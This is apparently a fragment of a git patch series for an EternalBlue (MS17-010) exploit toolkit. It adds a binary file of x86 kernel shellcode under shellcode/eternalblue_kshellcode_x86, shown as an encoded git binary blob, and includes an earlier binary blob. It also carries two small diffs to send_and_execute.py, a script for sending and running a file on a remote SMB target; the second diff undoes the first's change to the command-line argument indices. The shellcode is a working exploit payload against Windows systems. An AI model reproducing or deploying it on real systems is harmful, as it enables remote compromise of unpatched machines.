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

literal 0
HcmV?d00001

diff --git a/send_and_execute.py b/send_and_execute.py
index de5d811..7abe056 100644
--- a/send_and_execute.py
+++ b/send_and_execute.py
@@ -1062,11 +1062,11 @@ def service_exec(conn, cmd):
 target = sys.argv[1]
 lfile = sys.argv[2]
 port = 445
-pipe_name = None if len(sys.argv) < 5 else sys.argv[4]
+pipe_name = None if len(sys.argv) < 5 else sys.argv[5]
 
 try:
-	if sys.argv[3] != '':
-		port = int(sys.argv[3])
+	if sys.argv[4] != '':
+		port = int(sys.argv[4])
 except:
 	pass
 
diff --git a/shellcode/eternalblue_kshellcode_x86 b/shellcode/eternalblue_kshellcode_x86
new file mode 100644
index 0000000000000000000000000000000000000000..d95125de878ec0628ebde014e60af44c0d4489da
GIT binary patch
literal 638
zcmXX@O=uHA6rOF@Hp;e1rIHGf3a-$ALQ;b?kkmz7(W<x`n|8a^Hi3{spyFZI1Y5zd
z6dWGgLoX%%fE7<F*yHxL+Z6>{Jm^8iONt0XLq%)Rr3!J9I)`Dt_rC9a@4d+oM9(-m
zLht393_|{Xb2=XPw63^_v^Fdvoc3Wa`pzH8uJFiwh5`sVo1F8NGd3l6xuGjW{EKs+
z=A0aK2oyq=l^<mO*IljG>mVY-4&pOBAGIr|zx$WcK7D`FtU^=%$REN|*-rMMOQAzJ
zr^+2~*yPItmsEWli>y_e+5Sx4Q`UlYYBE<GC9ml_>|rN)gZ8Yq8n(|=LT0Qtx5(1~
zoWxt<mGTavg^OD$YrUHZlKYL`gng#OnlV3Fr6{Qub{wrU`O&BjYVD8+hCkH4;M<%T
z>NWMiB#g7x;6?8($?hr>kBTkFd|}U+Y5j||^{AaLFlnhdXqn~bDM`8#PVghv%c}>c
z$We-;wj@a-R_yHB3vz(sSzCJwV(3n(lhN8S!U9{n=aLqhsaG>F#V&xDfZ;tQW&?(L
zKt0UV&O;2CZ{!fA#6A57s612419t(`5K{vd7((|N%DO4K+UL%j4rXQ6)_={bu0rDh
zWlT{sDH-~rcJ47xYgCp5$*HzU!ztV)52dV)%Joq)P5+3hE-Nt59A?6Jm0oVF?&lK_
zImtR_^;l%2@sR=tLN}niQQ~{_-yrpsZ*eD3KhkTU1n@Q1nvf?9(od;ln2FkVMW3+i
Wn{`!18IxtXX<)GYURh4ntN#GOSMd7)

literal 0
HcmV?d00001


From 8402f17c990fd0135ac050fee40b6e4c9fe129b0 Mon Sep 17 00:00:00 2001
From: Helvio Junior <34519097+helviojunior@users.noreply.github.com>
Date: Fri, 31 Aug 2018 19:34:35 -0300
Subject: [PATCH 5/5] Correction of pipe and port array index

---
 send_and_execute.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/send_and_execute.py b/send_and_execute.py
index 7abe056..de5d811 100644
--- a/send_and_execute.py
+++ b/send_and_execute.py
@@ -1062,11 +1062,11 @@ def service_exec(conn, cmd):
 target = sys.argv[1]
 lfile = sys.argv[2]
 port = 445
-pipe_name = None if len(sys.argv) < 5 else sys.argv[5]
+pipe_name = None if len(sys.argv) < 5 else sys.argv[4]
 
 try:
-	if sys.argv[4] != '':
-		port = int(sys.argv[4])
+	if sys.argv[3] != '':
+		port = int(sys.argv[3])
 except:
 	pass